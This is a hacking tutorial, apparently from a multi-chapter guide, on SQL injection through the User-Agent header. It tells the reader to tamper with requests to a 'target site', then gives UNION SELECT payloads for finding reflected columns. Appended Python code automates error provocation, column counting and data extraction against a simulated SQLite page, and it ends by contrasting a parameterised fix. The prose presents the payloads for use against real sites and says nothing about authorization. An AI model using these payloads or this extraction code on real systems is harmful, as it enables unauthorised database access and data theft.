User agent based SQL Injection


This trick is such an underdog in the SQLi world, it's unbelievable.
What we want is a site that stores User-Agent strings and displays them back later (visitor-stats pages and admin logs are the usual places). A normal Firefox User-Agent looks something like:
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Now we want to provoke an error. It is slightly different because you're working with the User-Agent header instead of a URL parameter, but nevertheless fairly easy to do.
Tools available for use:
1. Live HTTP Headers (Firefox add-on)
2. Tamper Data (another Firefox add-on)
I will keep these two as the main options, as they are the easiest to use. In my example I will use Tamper Data to edit the User-Agent; anything that lets you rewrite request headers (an intercepting proxy, or curl with -A) does the same job.

Steps:
1. Open up Tamper Data.
2. Reload your target site.
3. Tamper the request.
4. Edit the User-Agent header.
Now we edit our User-Agent just as we would add the ' sign in a normal SQL injection: append a single quote to the value, so that the quote lands inside the site's query.
Most likely you will get a database error (check back to chapter 1 for which errors to look for). If nothing shows, the quote may still have broken the query silently, so try the column-count step anyway.
Now, to work out the number of columns, we send:
User-Agent: ' union select 1-- -
(Note the double -- signs at the end, make sure you have those! MySQL only treats -- as a comment when whitespace follows it, so the trailing space and dash stop the space from being trimmed off.)
Now we keep going, ' union select 1,2-- -, then ' union select 1,2,3-- - and so on, until the error disappears and the numbers show up on the page. In my example they show at two columns. A number that appears on the page is a column you can pull data through.
Now all you have to do is follow chapter 1 again. It is slightly different because everything goes through the header, but you get the point.
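The whole procedure above, as an added worked example that is not from the original page: a Python stand-in for a vulnerable visitor-stats page (assumed to run a SELECT with the User-Agent concatenated straight in; real targets are usually MySQL, here it is SQLite in memory so it runs offline) next to the parameterised fix, with the attacker's side that provokes the error, steps the UNION column count until the marker numbers are reflected, and then pulls data through the reflected column. The host name, table and column names are invented for the example.

```python
import sqlite3

FIREFOX_UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201"


def build_db():
    """Constructed in-memory visitor log standing in for the target site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, agent TEXT)")
    db.executemany(
        "INSERT INTO visits (agent) VALUES (?)",
        [(FIREFOX_UA,), ("curl/7.68.0",)],
    )
    return db


def raw_request(user_agent, host="target.example"):
    """What the edited request looks like on the wire (hypothetical host and path)."""
    return (
        "GET /stats.php HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {user_agent}\r\n"
        "\r\n"
    )


def stats_page_vulnerable(db, user_agent):
    """Simulated 'hits from this browser' page: concatenates the header into SQL."""
    sql = "SELECT id, agent FROM visits WHERE agent = '" + user_agent + "'"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # the error the tutorial tells you to provoke (MySQL wording differs)
        return "Database error: " + str(exc)
    return "\n".join(" | ".join(str(c) for c in row) for row in rows) or "no hits"


def stats_page_fixed(db, user_agent):
    """Same page with a bound parameter: the header can no longer change the query."""
    rows = db.execute(
        "SELECT id, agent FROM visits WHERE agent = ?", (user_agent,)
    ).fetchall()
    return "\n".join(" | ".join(str(c) for c in row) for row in rows) or "no hits"


def provoke_error(page):
    """Step one: a bare quote in the header should produce a database error."""
    return page("'")


def find_column_count(page, max_cols=10):
    """Step the UNION column count upward until the error stops AND the marker
    numbers are reflected on the page. Returns (count, payload) or None."""
    for n in range(1, max_cols + 1):
        markers = list(range(1, n + 1))
        # '-- -' rather than '--': MySQL needs whitespace after the comment marker
        payload = "' union select " + ", ".join(map(str, markers)) + "-- -"
        body = page(payload)
        if body.startswith("Database error"):
            continue  # column-count mismatch: add another column and retry
        # "no error" alone is not proof; require the numbers to actually show
        if " | ".join(map(str, markers)) in body:
            return n, payload
    return None


def extract(page, column_count, expression):
    """Once the count is known, put a subquery into one of the reflected columns."""
    cols = ["1"] * column_count
    cols[-1] = "(" + expression + ")"
    return page("' union select " + ", ".join(cols) + "-- -")


if __name__ == "__main__":
    db = build_db()
    vuln = lambda ua: stats_page_vulnerable(db, ua)
    print(raw_request("'"))
    print(provoke_error(vuln))
    print(find_column_count(vuln))
    print(extract(vuln, 2, "select agent from visits where id = 2"))
    print(find_column_count(lambda ua: stats_page_fixed(db, ua)))
```

Against the vulnerable page the quote alone raises an error, `' union select 1-- -` fails with a column-count mismatch, and `' union select 1, 2-- -` renders `1 | 2`, so two columns are reflected and either can carry a subquery. Against the fixed page every payload returns `no hits`: the loop finds nothing because the stored value is compared as data, which is the actual remediation for this class of bug, not a user-agent blacklist.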